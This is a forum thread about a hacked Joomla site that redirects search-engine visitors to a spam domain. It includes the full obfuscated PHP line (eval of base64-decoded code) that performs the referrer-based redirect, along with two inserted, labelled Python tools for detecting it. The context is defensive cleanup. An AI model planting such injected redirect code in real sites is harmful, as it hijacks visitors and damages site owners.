
HELP! Possible 302 hijack for client site

HELP! Possible 302 hijack for client site designcouch 7/6/12 7:07 AM
My client's site has been the victim of a possible 302 hijack. Searching for "Frederick Living" brings up their results (www.frederick-mennonite.org) but when the links are clicked, pages from the bee.edns.biz domain are shown. This is an unrelated site, and contains spam targeted at the market that my client's site is focused on (retirees). PLEASE HELP! I am in the middle of coding a new site for them, and need this rectified so that Google will index the new site when it launches.
Re: HELP! Possible 302 hijack for client site kravman85 7/7/12 9:09 AM
I'm having the exact same problem as well. I'm going to try refreshing/flushing DNS, new primary domain, then if all else fails contacting the hosting company. Remember to use best practices and I typically ban any out-of-country IP address.
Re: HELP! Possible 302 hijack for client site webado 7/7/12 9:28 AM
Actually it's not hijacked.

The website has been hacked with a conditional hack that redirects to the other, possibly malicious, site. That might be done through JavaScript, so all internal js files and on-page js code need to be checked, and all external js files can be considered suspect.
Re: HELP! Possible 302 hijack for client site designcouch 7/7/12 10:18 AM
Unless the site hack is dependent on the user arriving from a search engine, this is not the case, as navigating directly to their site doesn't result in a redirect.
Re: HELP! Possible 302 hijack for client site webado 7/7/12 10:29 AM
I said it's a conditional hack - and that it appears to be through javascript.
Re: HELP! Possible 302 hijack for client site designcouch 7/9/12 6:47 AM
Thank you for your response, webado. I'm poring over the site's javascript (on page and internal) files looking for the inserted code. The only external files are direct links to the Google code library (specifically the jQuery library). Can I consider those secure?
Re: HELP! Possible 302 hijack for client site redleg-redleg 7/9/12 6:53 AM
Check your site for some obfuscated PHP code, a line that starts out like this:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlY  ...........

The string of seemingly random characters will be pretty long. Start with your homepage; the files includes/defines.php and /configuration.php are also possibilities.
Re: HELP! Possible 302 hijack for client site designcouch 7/9/12 6:58 AM
Redleg,

That line of code appears to be in the index.php file of my site. Should deleting it solve the issue?
Re: HELP! Possible 302 hijack for client site redleg-redleg 7/9/12 7:19 AM
Yes, you need to remove that line. Just to be sure, here is the entire line:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkc
WF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfV
VNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikpewppZiAoc3Rya
XN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicm
FtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3Rya
XN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIn
dlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG
9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Ig
cHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2
ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvb
SIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0Ka
WYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRl
cigiTG9jYXRpb246IGh0dHA6Ly9waW9wby4yNXUuY29tLyIpOw0KZXhpdCgpOw0KfQp9DQp9DQp9DQp9")); //

Also, unfortunately, with this hack that line of code is placed in multiple files on the site, so you will need to check any files named index.php and the core files includes/defines.php and /configuration.php. If present, it will be the same line in all the files.
Re: HELP! Possible 302 hijack for client site designcouch 7/9/12 7:36 AM
Redleg,

Yeah - I'd started looking into everything on the site, and it appears that most .php files are affected. It looks like I have a long day ahead of me deleting and re-saving files. In your experience, would re-installing Joomla be a viable solution?
Re: HELP! Possible 302 hijack for client site redleg-redleg 7/9/12 7:42 AM
If you have a lot of individual files to clean up then it would probably end up being faster in the long run to re-install Joomla.
Re: HELP! Possible 302 hijack for client site designcouch 7/10/12 9:33 AM
Red Leg,

I have re-installed Joomla AND restored the site from a backup from last year. All of the base64 code that was inserted is gone. However, search engines are still forwarding the site to the spam pages. Do you have any thoughts? Does it just take a while for my changes to propagate? I was under the impression that the results should be instant.
Re: HELP! Possible 302 hijack for client site designcouch 7/10/12 9:56 AM
I have also done a basic process inspection when clicking on the link from Google. This confirms that the hack is a 302 redirect, as initially suspected. I have included a screenshot of this process - note the status on the very top entry (the "frederick-mennonite.org" url). 
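The same comparison done by hand above, as an added example that is not part of the original thread: request the page once directly and once with a search-engine Referer, without following redirects, and compare the two responses. The referrer value, the stub server that stands in for the infected site, and `spam.example` are constructed for offline testing.

```python
import http.client, threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

SEARCH_REFERER = "https://www.google.com/url?sa=t"  # constructed referrer value

def probe(url, referer=None):
    """One GET without following redirects; returns (status, Location)."""
    u = urlsplit(url)
    cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = cls(u.netloc, timeout=10)
    headers = {"User-Agent": "Mozilla/5.0"}  # browser-like User-Agent
    if referer:
        headers["Referer"] = referer
    path = (u.path or "/") + ("?" + u.query if u.query else "")
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    result = (resp.status, resp.getheader("Location"))
    conn.close()
    return result

def conditional_redirect(url):
    """Compare a direct visit with a visit arriving from a search result."""
    direct, via_search = probe(url), probe(url, SEARCH_REFERER)
    conditional = via_search[0] in (301, 302, 303, 307) and via_search != direct
    return {"direct": direct, "via_search": via_search, "conditional": conditional}

class _InfectedStub(BaseHTTPRequestHandler):
    """Constructed stand-in for the infected site's behaviour (offline test only)."""
    def do_GET(self):
        if "google" in self.headers.get("Referer", ""):
            self.send_response(302)
            self.send_header("Location", "http://spam.example/")
        else:
            self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()
    def log_message(self, *args):
        pass  # keep the demo quiet

def start_stub():
    srv = HTTPServer(("127.0.0.1", 0), _InfectedStub)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}/"

if __name__ == "__main__":
    srv, url = start_stub()
    print(conditional_redirect(url))
    srv.shutdown()
```

Run against the real site after each cleanup pass; `conditional` stays true for as long as any infected file is still being served.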


Re: HELP! Possible 302 hijack for client site redleg-redleg 7/10/12 11:05 AM
Unfortunately there is still something wrong: a lingering hack somewhere that did not get overwritten. There is a listing for a simple script at

http://redleg-redleg.blogspot.com/p/simple-script-to-find-base64decode-in.html

You copy and paste the script into a file then upload it to your server then open it in a browser.  The script will scan your files for any occurrences of the string base64 and echo the path/filename to the browser.  You might try running that and see if it finds anything.
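A scanner in the same spirit, as an added example (this is not the script at the link above, and not code from the thread): it walks a local copy of the webroot, matches the `eval(base64_decode("..."))` statement shape quoted earlier, and decodes each payload without executing it to report the redirect target. The sample tree, its payload and `spam.example` are constructed.

```python
import base64, binascii, re, tempfile
from pathlib import Path

# Statement shape quoted in the thread: eval(base64_decode("..."));
INJECT_RE = re.compile(
    rb'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)')
LOCATION_RE = re.compile(rb'header\s*\(\s*["\']Location:\s*([^"\']+)', re.I)

def scan_file(path):
    """Find injected statements in one file; payloads are decoded, never run."""
    data = Path(path).read_bytes()
    findings = []
    for m in INJECT_RE.finditer(data):
        blob = re.sub(rb"\s+", b"", m.group(1))  # payload may be line-wrapped
        try:
            decoded = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            decoded = b""  # still reported: the eval() wrapper alone is suspect
        loc = LOCATION_RE.search(decoded)
        findings.append({
            "file": str(path),
            "line": data.count(b"\n", 0, m.start()) + 1,
            "redirect": loc.group(1).decode("latin-1").strip() if loc else None,
            "checks_referer": b"HTTP_REFERER" in decoded,
        })
    return findings

def scan_tree(root):
    """Scan every .php file under root (a local copy of the webroot)."""
    return [f for p in sorted(Path(root).rglob("*.php")) for f in scan_file(p)]

def make_sample_site():
    """Constructed sample: two infected files, one clean file."""
    root = Path(tempfile.mkdtemp())
    payload = base64.b64encode(
        b'if (stristr($_SERVER["HTTP_REFERER"],"google")) '
        b'{ header("Location: http://spam.example/"); exit(); }')
    bad = b'<?php\neval(base64_decode("' + payload + b'")); //\n?>\n'
    (root / "includes").mkdir()
    (root / "index.php").write_bytes(bad)
    (root / "includes" / "defines.php").write_bytes(bad)
    # Legitimate base64 use: a plain search for "base64" would list this file.
    (root / "about.php").write_bytes(b'<?php $t = base64_decode($_GET["t"]); ?>\n')
    return root

if __name__ == "__main__":
    for hit in scan_tree(make_sample_site()):
        print(hit)
```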
Re: HELP! Possible 302 hijack for client site designcouch 7/10/12 12:29 PM
Thanks Red Leg - that allowed me to locate the rest. Will update on whether or not it was successful.
Re: HELP! Possible 302 hijack for client site designcouch 7/10/12 1:34 PM
Final update - consider this issue closed. Red Leg's script helped me locate the last few files. Search results are now functioning just as they should. Thanks all!